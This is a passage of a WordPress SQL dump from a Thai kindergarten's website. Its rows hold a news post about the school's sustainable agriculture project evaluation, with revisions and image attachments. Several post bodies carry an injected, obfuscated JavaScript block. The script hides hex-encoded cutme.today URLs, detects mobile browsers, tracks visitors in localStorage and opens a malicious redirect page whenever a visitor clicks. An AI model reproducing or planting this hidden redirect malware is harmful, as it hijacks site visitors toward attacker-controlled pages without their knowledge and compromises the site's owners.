)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','เมื่อวันที่ 10 สิงหาคม 2567 โรงเรียนอนุบาลวัดพระโต ได้รับการประเมิน ‘โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน‘ ระดับประเทศ โดยมี นายปรัชญา ตะภา ผู้อำนวยการวิทยาลัยเกษตรและเทคโนโลยีมหาสารคาม เป็นประธานการประเมิน','','publish','open','open','','%e0%b9%80%e0%b8%a1%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88-10-%e0%b8%aa%e0%b8%b4%e0%b8%87%e0%b8%ab%e0%b8%b2%e0%b8%84%e0%b8%a1-2567-%e0%b9%82%e0%b8%a3%e0%b8%87','','','2024-08-15 10:52:01','2024-08-15 03:52:01','',0,'http://watprato.ssk.in.th/?p=177',0,'post','',0),
(178,1,'2024-08-15 10:46:47','2024-08-15 03:46:47','','www.karnmuangchumchon.com-1723275045574-696x392','','inherit','open','closed','','www-karnmuangchumchon-com-1723275045574-696x392','','','2024-08-15 10:46:47','2024-08-15 03:46:47','',177,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/www.karnmuangchumchon.com-1723275045574-696x392-1.jpg',0,'attachment','image/jpeg',0),
(179,1,'2024-08-15 10:47:43','2024-08-15 03:47:43','<!-- wp:paragraph -->\n<p>นายอักษร แสนใหม่ ประธานคณะกรรมการสถานศึกษาฯ พร้อมด้วย นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญโรงเรียนอนุบาลวัดพระโต รองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนร่วมต้อนรับ พร้อมทั้งวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ ตัวแทนเครือข่ายผู้ปกครอง ชุมชน <a></a>และโรงเรียนเครือข่ายร่วมต้อนรับ และจัดแสดงนิทรรศการชีววิถี</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','เมื่อวันที่ 10 สิงหาคม 2567 โรงเรียนอนุบาลวัดพระโต ได้รับการประเมิน ‘โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน‘ ระดับประเทศ โดยมี นายปรัชญา ตะภา ผู้อำนวยการวิทยาลัยเกษตรและเทคโนโลยีมหาสารคาม เป็นประธานการประเมิน','','inherit','closed','closed','','177-revision-v1','','','2024-08-15 10:47:43','2024-08-15 03:47:43','',177,'http://watprato.ssk.in.th/?p=179',0,'revision','',0),
(180,1,'2024-08-15 10:51:32','2024-08-15 03:51:32','','www.karnmuangchumchon.com-1723274955542','','inherit','open','closed','','www-karnmuangchumchon-com-1723274955542','','','2024-08-15 10:51:32','2024-08-15 03:51:32','',177,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/www.karnmuangchumchon.com-1723274955542.jpg',0,'attachment','image/jpeg',0),
(182,1,'2024-08-15 10:51:54','2024-08-15 03:51:54','','www.karnmuangchumchon.com-1723275045574-696x392','','inherit','open','closed','','www-karnmuangchumchon-com-1723275045574-696x392-2','','','2024-08-15 10:51:54','2024-08-15 03:51:54','',177,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/www.karnmuangchumchon.com-1723275045574-696x392-2.jpg',0,'attachment','image/jpeg',0),
(183,1,'2024-08-15 10:51:59','2024-08-15 03:51:59','<!-- wp:paragraph -->\n<p>นายอักษร แสนใหม่ ประธานคณะกรรมการสถานศึกษาฯ พร้อมด้วย นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญโรงเรียนอนุบาลวัดพระโต รองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนร่วมต้อนรับ พร้อมทั้งวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ ตัวแทนเครือข่ายผู้ปกครอง ชุมชน <a></a>และโรงเรียนเครือข่ายร่วมต้อนรับ และจัดแสดงนิทรรศการชีววิถี</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"c48daaf2\",\"mediaId\":180,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-c48daaf2\"><img class=\"gb-image gb-image-c48daaf2\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/www.karnmuangchumchon.com-1723274955542.jpg\" alt=\"\" title=\"www.karnmuangchumchon.com-1723274955542\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"1674a9fd\",\"mediaId\":182,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-1674a9fd\"><img class=\"gb-image gb-image-1674a9fd\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/www.karnmuangchumchon.com-1723275045574-696x392-2.jpg\" alt=\"\" title=\"www.karnmuangchumchon.com-1723275045574-696x392\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 